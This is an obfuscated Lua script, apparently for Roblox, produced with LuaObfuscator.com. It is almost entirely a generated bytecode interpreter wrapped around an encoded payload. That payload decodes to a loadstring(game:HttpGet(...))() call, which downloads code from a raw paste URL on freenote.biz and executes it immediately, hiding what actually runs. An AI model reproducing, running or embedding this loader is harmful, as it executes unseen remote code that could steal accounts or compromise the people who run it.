--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v75=v5(v68,v19);v19=nil;return v75;else return v68;end end end);local function v20(v31,v32,v33) if v33 then local v69=0 -0 ;local v70;while true do if (v69==(0 -(0 -0))) then v70=(v31/((3 -1)^(v32-((1067 -(68 + 997)) -1))))%((621 -((1825 -(226 + 1044)) + (278 -214)))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -((331 -(32 + 85)) + 713)))) ;return v70-(v70%(1 + 0)) ;end end else local v71=(1 + 1)^(v32-((861 + 17) -(63 + 219 + 595))) ;return (((v31%(v71 + v71))>=v71) and (1638 -(1523 + 114))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (959 -(892 + 65)) ;return (v36 * (610 -354)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + ((5 + 1) -2) ;return (v40 * ((75619341 -44819225) -14022900)) + (v39 * ((48457 + 17429) -(87 + 263))) + (v38 * ((1732 -1296) -(67 + 113))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=19 -(10 + 8) ;local v44=(v20(v42,953 -(802 + 150) ,53 -33 ) * ((6 -4)^(57 -25))) + v41 ;local v45=v20(v42,21,54 -23 );local v46=((v20(v42,24 + 8 )==(998 -(915 + 82))) and  -(2 -1)) or (1 + 0) ;if (v45==(0 -(0 -0))) then if (v44==(1187 -(1069 + 7 + 111))) then return v46 * ((0 + 0) -0) ;else v45=773 -(201 + 571) ;v43=0 -(885 -(261 + 624)) ;end elseif (v45==(356 + 1691)) then return ((v44==(0 -0)) and (v46 * ((1 + 0)/((0 -0) -0)))) or (v46 * NaN) ;end return v8(v46,v45-(1814 -(368 + 423)) ) * (v43 + (v44/((7 -(1085 -(1020 + 60)))^(163 -111)))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(1423 -(630 + 793))) then return "";end end v48=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;local v49={};for v66=4 -3 , #v48 do v49[v66]=v2(v1(v3(v48,v66,v66)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=0 -0 ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v50==(8 -5)) then v57=nil;v58=nil;v50=1 + 3 ;end if (v50==(1024 -(706 + 318))) then v51=1251 -(721 + 530) ;v52=nil;v50=1272 -(945 + 326) ;end if (v50~=(1976 -(1913 + 62))) then else v53=nil;v54=nil;v50=2;end if (v50~=4) then else while true do if (v51==(7 -4)) then v58=nil;while true do local v96=0 + 0 ;local v97;local v98;while true do if (v96~=(1 + 0)) then else while true do if (v97==(700 -(271 + 429))) then v98=0 + 0 ;while true do if (v98~=(1500 -(1408 + 92))) then else local v118=1086 -(461 + 625) ;while true do if (v118==(0 -0)) then local v122=1288 -(993 + 295) ;while true do if (v122~=(857 -(564 + 292))) then else v118=1;break;end if (v122~=(0 + 0)) then else if (v52==(1 -0)) then local v124=0 -0 ;while true do if (0==v124) then local v128=304 -(244 + 60) ;while true do if (v128==(1171 -(418 + 753))) then local v134=476 -(41 + 435) ;while true do if (v134~=(1 + 0)) then else v128=1;break;end if (v134~=(0 + 0)) then else v56={v53,v54,nil,v55};v57=v23();v134=530 -(406 + 123) ;end end end if (v128~=(1770 -(1749 + 20))) then else v124=1 + 0 ;break;end end end if (v124~=(1 + 0)) then else v58={};v52=2;break;end end end if (v52~=(1324 -(1249 + 73))) then else local v125=267 -(176 + 91) ;while true do if (v125~=(0 -0)) then else local v129=0 -0 ;while true do if ((0 + 0)==v129) then for v137=1146 -(466 + 679) ,v57 do local v138=0 -0 ;local v139;local v140;local v141;while true do if (v138~=0) then else v139=0;v140=nil;v138=2 -1 ;end if (v138==(1876 -(157 + 1718))) then v141=nil;while true do if (v139==(0 + 0)) then v140=v21();v141=nil;v139=1901 -(106 + 1794) ;end if ((1 + 0)~=v139) then else if (v140==1) then v141=v21()~=0 ;elseif (v140==2) then v141=v24();elseif (v140~=3) then else v141=v25();end v58[v137]=v141;break;end end break;end end end v56[1 + 2 ]=v21();v129=2 -1 ;end if (1==v129) then v125=2 -1 ;break;end end end if (1~=v125) then else for v130=1,v23() do local v131=114 -(4 + 110) ;local v132;local v133;while true do if (v131==0) then v132=584 -(57 + 527) ;v133=nil;v131=1428 -(41 + 1386) ;end if ((2 -1)~=v131) then else while true do if (v132~=(103 -(17 + 86))) then else v133=v21();if (v20(v133,1 + 0 ,1 -0 )==0) then local v144=0 + 0 ;local v145;local v146;local v147;local v148;while true do if ((2 -1)==v144) then local v150=0;while true do if (v150==(1 -0)) then v144=168 -(122 + 44) ;break;end if (0~=v150) then else v147=nil;v148=nil;v150=1 -0 ;end end end if (v144==(1229 -(322 + 905))) then while true do if (v145==(612 -(602 + 9))) then local v153=1189 -(449 + 740) ;local v154;local v155;while true do if (v153==0) then v154=0 -0 ;v155=nil;v153=1 + 0 ;end if (v153~=1) then else while true do if (v154==(0 + 0)) then v155=0 -0 ;while true do if ((65 -(30 + 35))==v155) then v148={v22(),v22(),nil,nil};if (v146==0) then local v167=0 -0 ;while true do if (0==v167) then v148[3]=v22();v148[15 -11 ]=v22();break;end end elseif (v146==1) then v148[1215 -(323 + 889) ]=v23();elseif (v146==2) then v148[3]=v23() -(2^(14 + 2)) ;elseif (v146==(7 -4)) then local v176=0;local v177;local v178;while true do if (v176==(581 -(361 + 219))) then while true do if (v177==(320 -(53 + 267))) then v178=0 + 0 ;while true do if (v178==(413 -(15 + 398))) then v148[1 + 2 ]=v23() -((984 -(18 + 964))^(60 -44)) ;v148[4]=v22();break;end end break;end end break;end if (v176==(683 -(483 + 200))) then v177=0 + 0 ;v178=nil;v176=1464 -(1404 + 59) ;end end end v155=1 + 0 ;end if (v155==(851 -(20 + 830))) then v145=767 -(468 + 297) ;break;end end break;end end break;end end end if (v145~=(2 + 0)) then else local v156=126 -(116 + 10) ;local v157;local v158;while true do if (v156==(1 + 0)) then while true do if (v157~=(0 -0)) then else v158=0;while true do if (v158~=(0 -0)) then else local v166=0 + 0 ;while true do if (v166==1) then v158=1;break;end if (v166==0) then if (v20(v147,237 -(141 + 95) ,739 -(542 + 196) )==(1 -0)) then v148[2]=v58[v148[2]];end if (v20(v147,4 -2 ,1 + 1 )==(2 -1)) then v148[1 + 2 ]=v58[v148[3]];end v166=1 + 0 ;end end end if ((1 + 0)==v158) then v145=2 + 1 ;break;end end break;end end break;end if ((0 -0)==v156) then v157=0;v158=nil;v156=1 + 0 ;end end end if (v145==(0 -0)) then local v159=0;local v160;while true do if (v159==(1551 -(1126 + 425))) then v160=405 -(118 + 287) ;while true do if (v160==(1 + 0)) then v145=3 -2 ;break;end if (v160==(0 -0)) then local v165=1121 -(118 + 1003) ;while true do if (v165~=(2 -1)) then else v160=378 -(142 + 235) ;break;end if (v165==(0 -0)) then v146=v20(v133,4 -2 ,1 + 2 );v147=v20(v133,981 -(553 + 424) ,10 -4 );v165=1;end end end end break;end end end if (v145==3) then if (v20(v147,3 + 0 ,129 -(55 + 71) )==1) then v148[4 + 0 ]=v58[v148[1794 -(573 + 1217) ]];end v53[v130]=v148;break;end end break;end if (v144~=(0 + 0)) then else local v151=0 + 0 ;local v152;while true do if ((0 + 0)==v151) then v152=0;while true do if (v152==(0 -0)) then local v164=0;while true do if (v164~=(0 -0)) then else v145=0;v146=nil;v164=1;end if (v164~=(2 -1)) then else v152=2 -1 ;break;end end end if (1==v152) then v144=1 -0 ;break;end end break;end end end end end break;end end break;end end end v52=1 + 2 ;break;end end end v122=4 -3 ;end end end if (v118==(1 -0)) then v98=807 -(118 + 688) ;break;end end end if (v98==(49 -(25 + 23))) then if (v52~=0) then else local v119=0;while true do if (v119==0) then local v123=753 -(239 + 514) ;while true do if (v123==0) then v53={};v54={};v123=1 + 0 ;end if (v123~=(1887 -(927 + 959))) then else v119=3 -2 ;break;end end end if (v119==(1 + 0)) then v55={};v52=1330 -(797 + 532) ;break;end end end if (v52~=(5 -2)) then else local v120=0;local v121;while true do if ((97 -(11 + 86))~=v120) then else v121=0;while true do if (v121~=(0 + 0)) then else local v126=285 -(175 + 110) ;local v127;while true do if (v126~=(0 -0)) then else v127=0 + 0 ;while true do if (v127==(0 -0)) then local v136=1202 -(373 + 829) ;while true do if ((0 -0)==v136) then for v142=732 -(476 + 255) ,v23() do v54[v142-(1131 -(369 + 761)) ]=v28();end return v56;end end end end break;end end end end break;end end end break;end end break;end end break;end if (v96==0) then v97=0 + 0 ;v98=nil;v96=2 -1 ;end end end break;end if (v51~=(1 + 0)) then else local v93=0 -0 ;while true do if (v93==0) then local v103=0 -0 ;while true do if (v103~=0) then else v54=nil;v55=nil;v103=1 + 0 ;end if (v103~=1) then else v93=239 -(64 + 174) ;break;end end end if (1==v93) then v51=1 + 1 ;break;end end end if ((535 -(43 + 490))~=v51) then else local v94=0;while true do if ((733 -(711 + 22))~=v94) then else local v104=0;while true do if (v104~=(3 -2)) then else v94=1 -0 ;break;end if (v104~=(0 + 0)) then else v56=nil;v57=nil;v104=1;end end end if (v94==(337 -(144 + 192))) then v51=219 -(42 + 174) ;break;end end end if (0~=v51) then else local v95=0 + 0 ;while true do if (v95~=(1 + 0)) then else v51=1745 -(1344 + 400) ;break;end if (v95~=(0 + 0)) then else v52=0;v53=nil;v95=1505 -(363 + 1141) ;end end end end break;end if (v50==2) then v55=nil;v56=nil;v50=408 -(255 + 150) ;end end end local function v29(v59,v60,v61) local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...) local v76=v63;local v77=v64;local v78=v65;local v79=v27;local v80=1;local v81= -1;local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v90=0,v84 do if (v90>=v78) then v82[v90-v78 ]=v83[v90 + 1 ];else v86[v90]=v83[v90 + 1 ];end end local v87=(v84-v78) + 1 ;local v88;local v89;while true do v88=v76[v80];v89=v88[1];if (v89<=2) then if (v89<=0) then local v105;v86[v88[2]]=v61[v88[3]];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v88[3];v80=v80 + 1 ;v88=v76[v80];v105=v88[2];v86[v105]=v86[v105](v86[v105 + 1 ]);v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]();v80=v80 + 1 ;v88=v76[v80];do return;end elseif (v89==1) then v86[v88[2]]=v61[v88[3]];else v86[v88[2]]();end elseif (v89<=3) then v86[v88[2]]=v88[3];elseif (v89>4) then local v116=v88[2];v86[v116]=v86[v116](v86[v116 + 1 ]);else do return;end end v80=v80 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end return v15("LOL!023O00030A3O006C6F6164737472696E6703493O006C6F6164737472696E672867616D653A482O74704765742O2822682O7470733A2O2F66722O656E6F74652E62697A2F7261772F7A35687572336462327322292C747275652O2928290A00053O00124O00013O00122O000100028O000200026O000100016O00017O00",v9(),...);